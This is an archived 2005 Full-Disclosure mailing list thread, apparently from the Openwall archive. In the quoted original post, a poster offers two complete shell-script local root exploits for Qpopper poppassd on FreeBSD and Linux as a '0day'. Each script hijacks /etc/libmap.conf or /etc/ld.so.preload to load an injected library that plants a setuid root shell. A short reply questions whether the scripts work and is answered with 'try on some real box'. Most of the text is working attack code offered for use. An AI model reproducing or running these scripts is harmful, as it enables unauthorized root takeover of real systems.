lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Sun Sep 25 18:06:27 2005
From: kingcope at gmx.net (kcope)
Subject: It's time for some warez - Qpopper poppassd
	local	r00t exploit

lol, yeah you're missing something :-)
just give a try on some real box...

best regards,
kcope


Harry Hoffman wrote:

> Umm, am I missing something here? It looks like you need to be root to 
> run this "program"?
>
> In the fbsd one you are trying to write to /etc which has perms:
> drwxr-xr-x  17 root  wheel  2560 Sep  9 13:49 etc
>
> and in the linux one you do a set{gid,uid} to 0.
>
> both of these actions will fail without having root priv already.
>
>
>
> kcope wrote:
>
>> hello this is kcope,
>> here is my Qpopper poppassd local r00t exploit (latest version, 0day) 
>> both for linux and freebsd systems... have fun 8-)#
>>
>> ------------------------------------------------------------------------
>>
>> #!/bin/sh
>> ########################################################################### 
>>
>> # FreeBSD Qpopper poppassd latest version local r00t exploit by 
>> kcope   ###
>> # tested on FreeBSD 
>> 5.4-RELEASE                                            ###
>> ########################################################################### 
>>
>>
>> POPPASSD_PATH=/usr/local/bin/poppassd
>> HOOKLIB=libutil.so.4
>>
>> echo ""
>> echo "FreeBSD Qpopper poppassd latest version local r00t exploit by 
>> kcope"
>> echo ""
>> sleep 2
>> umask 0000
>> if [ -f /etc/libmap.conf ]; then
>> echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
>> exit
>> fi
>> cat > program.c << _EOF
>> #include <unistd.h>
>> #include <stdio.h>
>> #include <sys/types.h>
>> #include <stdlib.h>
>>
>> void _init()
>> {
>>  if (!geteuid()) {
>>  remove("/etc/libmap.conf");
>>  execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod 
>> +xs /tmp/xxxx",NULL);
>>  }
>> }
>>
>> _EOF
>> gcc -o program.o -c program.c -fPIC
>> gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o 
>> -nostartfiles
>> cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
>> echo "--- Now type ENTER ---"
>> echo ""
>> $POPPASSD_PATH -t /etc/libmap.conf
>> echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
>> su
>> if [ -f /tmp/xxxx ]; then
>> echo "IT'S A ROOTSHELL!!!"
>> /tmp/xxxx
>> else
>> echo "Sorry, exploit failed."
>> fi
>>  
>>
>> ------------------------------------------------------------------------
>>
>> #!/bin/sh
>> ########################################################################### 
>>
>> # Linux Qpopper poppassd latest version local r00t exploit by 
>> kcope       ###
>> # August 2005                                ###
>> # Confidential - Keep Private!                        ###
>> ########################################################################### 
>>
>>
>> POPPASSD_PATH=/usr/local/bin/poppassd
>>
>> echo ""
>> echo "Linux Qpopper poppassd latest version local r00t exploit by kcope"
>> echo ""
>> sleep 2
>> umask 0000
>> if [ -f /etc/ld.so.preload ]; then
>> echo "OOPS /etc/ld.so.preload already exists.. exploit failed!"
>> exit
>> fi
>> cat > program.c << _EOF
>> #include <unistd.h>
>> #include <stdio.h>
>> #include <sys/types.h>
>> #include <stdlib.h>
>>
>> void _init()
>> {
>>  if (!geteuid()) {
>>  setgid(0);
>>  setuid(0);
>>  remove("/etc/ld.so.preload");
>>  execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s 
>> /tmp/suid",NULL);
>>  }
>> }
>>
>> _EOF
>> gcc -o program.o -c program.c -fPIC
>> gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o 
>> -nostartfiles
>> cat > suid.c << _EOF
>> int main(void) {
>>        setgid(0); setuid(0);
>>        unlink("/tmp/suid");
>>        execl("/bin/sh","sh",0); }
>> _EOF
>>
>> gcc -o /tmp/suid suid.c
>> cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
>> echo "--- Now type ENTER ---"
>> echo ""
>> $POPPASSD_PATH -t /etc/ld.so.preload
>> echo /tmp/libno_ex.so.1.0 > /etc/ld.so.preload
>> su
>> if [ -f /tmp/suid ]; then
>> echo "IT'S A ROOTSHELL!!!"
>> /tmp/suid
>> else
>> echo "Sorry, exploit failed."
>> fi
>>  
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ